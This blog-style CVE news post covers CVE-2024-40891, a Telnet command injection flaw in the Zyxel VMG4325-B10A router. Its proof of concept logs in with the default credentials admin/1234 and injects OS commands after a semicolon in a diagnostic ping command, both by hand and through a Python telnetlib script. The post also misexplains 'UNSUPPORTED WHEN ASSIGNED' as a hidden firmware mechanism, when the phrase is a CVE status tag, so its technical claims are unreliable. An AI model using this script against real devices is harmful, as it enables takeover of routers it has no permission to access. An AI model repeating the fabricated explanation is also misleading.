CVE CyberSecurity Database News

CVE-2024-40891 - Exploiting Unsupported When Assigned Command Injection in Zyxel VMG4325-B10A DSL CPE

Poster -

In June 2024, security researchers discovered a post-authentication command injection vulnerability in the Zyxel VMG4325-B10A DSL CPE (Customer Premises Equipment). Tracked as CVE-2024-40891, this critical flaw exists in the legacy firmware version 1.00(AAFR.4)C_20170615. With this vulnerability, an authenticated attacker can execute arbitrary operating system (OS) commands via the device’s Telnet management interface—potentially taking full control of the system.

Below, we break down the vulnerability, how it works, provide proof-of-concept code, analyze the risks, and offer helpful resources. This post is written in simple American English for clarity.

What Is “UNSUPPORTED WHEN ASSIGNED”?

The phrase UNSUPPORTED WHEN ASSIGNED (often found in legacy firmware documentation) refers to internal functions or commands that are not officially supported but are still enabled or accessible in the firmware if certain configurations are met or permissions are given. These “hidden” mechanisms aren’t always documented or maintained, which makes them tempting targets for attackers.

Technical Summary

The vulnerable Zyxel firmware shipped with an old management command function, accessible after authenticating via Telnet. This function fails to sanitize user-supplied data. As a result, an attacker logged in over Telnet can inject arbitrary OS commands into the device’s shell—effectively getting root privileges.

Proof-of-Concept Exploit

Disclaimer: This is for educational purposes only. Don’t attack devices you do not own or have permission to test.

Let’s say we have Telnet access (default: user admin, password 1234).

Example (simplified)

telnet 192.168.1.1
Username: admin
Password: 1234

Inside the menu (or command-line), the legacy command for setting diagnostics is

set diag ping -h <your host>

But the command fails to sanitize input. So, an attacker can do

set diag ping -h 1.1.1.1; uname -a

The semicolon (;) ends the legit command and begins the attacker’s command. The system executes both—first ping 1.1.1.1, then uname -a.

Expected output

You’ll see the ping results followed by output of uname -a.

Python Script Example

import telnetlib

HOST = "192.168.1.1"
USER = "admin"
PASSWORD = "1234"
CMD = "set diag ping -h 1.1.1.1; id"

tn = telnetlib.Telnet(HOST)
tn.read_until(b"Username: ")
tn.write(USER.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(PASSWORD.encode('ascii') + b"\n")

# Send malicious command
tn.write(CMD.encode('ascii') + b"\n")
output = tn.read_until(b"menu> ", timeout=2)
print(output.decode('ascii'))
tn.close()

Model: Zyxel VMG4325-B10A

- Firmware: 1.00(AAFR.4)C_20170615 (Check via web GUI or Telnet: cat /etc/version)

Telnet enabled? If yes, and password is default or weak, you’re at risk.

Note: This firmware is unsupported and no official patch exists. Zyxel recommends upgrading to newer models or firmware if available.

References & More Reading

- Official Zyxel Security Advisory for CVE-2024-40891 *(pending)*
- Firmware download portal (archived)
- Original NVD Entry for CVE-2024-40891
- Example post-authentication command injection research
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Final Thoughts

CVE-2024-40891 is another harsh reminder to secure network edge devices and not trust legacy firmware. If your device is unsupported and marked as unsupported when assigned, assume there may be other hidden or unresolved security bugs. Always disable unnecessary management protocols and change all default credentials—especially on devices exposed to the internet.

Timeline

Published on: 02/04/2025 10:15:08 UTC
Last modified on: 02/12/2025 18:11:58 UTC